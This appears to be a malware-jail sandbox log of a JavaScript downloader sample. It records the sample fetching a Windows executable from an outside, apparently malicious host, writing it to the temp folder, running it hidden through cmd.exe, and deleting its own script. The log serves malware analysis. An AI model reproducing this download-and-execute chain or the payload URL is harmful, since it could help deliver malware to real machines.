forked from HynekPetrak/malware-jail
cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.out
30 Sep 01:02:11 - mailware-jail, a malware sandbox ver. 0.5
30 Sep 01:02:11 - ------------------------
30 Sep 01:02:11 - Sandbox environment sequence: env/utils.js,env/eval.js,env/function.js,env/wscript.js,env/browser.js,env/agents.js,env/other.js,env/console.js
30 Sep 01:02:11 - Malware files: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Output file for sandbox dump: sandbox_dump_after.json
30 Sep 01:02:11 - Output directory for generated files: output/
30 Sep 01:02:11 - ==> Preparing Sandbox environment.
30 Sep 01:02:11 - => Executing: env/utils.js
30 Sep 01:02:11 - => Executing: env/eval.js
30 Sep 01:02:11 - Preparing sandbox to intercept eval() calls.
30 Sep 01:02:11 - => Executing: env/function.js
30 Sep 01:02:11 - Preparing sandbox to intercept 'new Function()' calls.
30 Sep 01:02:11 - => Executing: env/wscript.js
30 Sep 01:02:11 - Preparing sandbox to emulate WScript environment.
30 Sep 01:02:11 - => Executing: env/browser.js
30 Sep 01:02:11 - Preparing sandbox to emulate Browser environment (default = IE11).
30 Sep 01:02:11 - Created: window[1]
30 Sep 01:02:11 - Created: document[2]
30 Sep 01:02:11 - document[2].createElement(html)
30 Sep 01:02:11 - Element[3] created, named: 'html'
30 Sep 01:02:11 - document[2].createElement(body)
30 Sep 01:02:11 - Element[5] created, named: 'body'
30 Sep 01:02:11 - document[2].body = 'Element[5]'
30 Sep 01:02:11 - document[2].createElement(head)
30 Sep 01:02:11 - Element[7] created, named: 'head'
30 Sep 01:02:11 - Element[3].appendChild(Element[7])
30 Sep 01:02:11 - Element[3].firstChild set
30 Sep 01:02:11 - document[2].body.get() => Element[5]
30 Sep 01:02:11 - Element[3].appendChild(Element[5])
30 Sep 01:02:11 - => Executing: env/agents.js
30 Sep 01:02:11 - Setting Browser environment to: IE8 on Win10 64bit
30 Sep 01:02:11 - window[1].userAgent.get() => Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; WOW64; Trident/7.0; Touch; .NET4.0C; .NET4.0E; . ... (truncated)
30 Sep 01:02:11 - => Executing: env/other.js
30 Sep 01:02:11 - => Executing: env/console.js
30 Sep 01:02:11 - ==> Executing malware file(s).
30 Sep 01:02:11 - => Executing: malware/20160929/cb7fc381f6f7600ca0060764ae117482cae3a0fa02db4467604a55c57d069124.js
30 Sep 01:02:11 - Strict mode: false
30 Sep 01:02:11 - Calling eval() no.: 1
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[9]
30 Sep 01:02:11 - WScript.SpecialFolders(Desktop)
30 Sep 01:02:11 - WScript.CreateShortcut(Desktop/?eno.lnk)
30 Sep 01:02:11 - Created: WshShortcut[10](Desktop/?eno.lnk)
30 Sep 01:02:11 - WshShortcut[10](Desktop/?eno.lnk).FullName.get() => Desktop/?eno.lnk
30 Sep 01:02:11 - WScript.CreateObject(Scripting.FileSystemObject)
30 Sep 01:02:11 - Scripting.FileSystemObject[11] created.
30 Sep 01:02:11 - WScript.CreateObject(WScript.Shell)
30 Sep 01:02:11 - Created: WScript.Shell[12]
30 Sep 01:02:11 - WScript.CreateObject(MSXML2.XMLHTTP)
30 Sep 01:02:11 - Created: MSXML2.XMLHTTP[13]
30 Sep 01:02:11 - WScript.CreateObject(ADODB.Stream)
30 Sep 01:02:11 - Created: ADODB_Stream[14]
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetSpecialFolder(2) => TemporaryFolder/
30 Sep 01:02:11 - Scripting.FileSystemObject[11].GetTempName() => TempFile[15]
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].open(GET,http://girlx.tornadodating.ru/js/boxun4.bin,0)
30 Sep 01:02:11 - MSXML2.XMLHTTP[13] string true
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async = 'false'
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].async.get() => false
30 Sep 01:02:11 - MSXML2.XMLHTTP[13].send(undefined)
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange(), readyState = 4 length: 196608 status: 200
30 Sep 01:02:15 - MSXML2.XMLHTTP[13] statusText = null
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].responseBody = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].status = '200'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].onreadystatechange() undefined
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].send(undefined) finished
30 Sep 01:02:15 - ADODB_Stream[14].type = '1'
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Open()
30 Sep 01:02:15 - ADODB_Stream[14].content = 'MZ?@?!?L?!This program cannot be ... (truncated)'
30 Sep 01:02:15 - ADODB_Stream[14].Write(str) - 196608 bytes
30 Sep 01:02:15 - ADODB_Stream[14].size = '196608'
30 Sep 01:02:15 - ADODB_Stream[14].SaveToFile(TemporaryFolder/TempFile[15], undefined)
30 Sep 01:02:15 - ADODB_Stream[14].content.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:15 - ADODB_Stream[14].Close()
30 Sep 01:02:15 - WScript.Shell[12].Run(cmd.exe /c TemporaryFolder/TempFile[15], 0, undefined)
30 Sep 01:02:15 - Scripting.FileSystemObject[11].DeleteFile(script_full_name.js)
30 Sep 01:02:15 - ==> Cleaning up sandbox.
30 Sep 01:02:15 - ==> Script execution finished, dumping sandbox environment to a file.
30 Sep 01:02:15 - MSXML2.XMLHTTP[13].ResponseBody.get() => MZ?@?!?L?!This program cannot be ... (truncated)
30 Sep 01:02:16 - Saving: output/TemporaryFolder_TempFile[15]
30 Sep 01:02:16 - Generated file saved
30 Sep 01:02:16 - The sandbox context has been saved to: sandbox_dump_after.json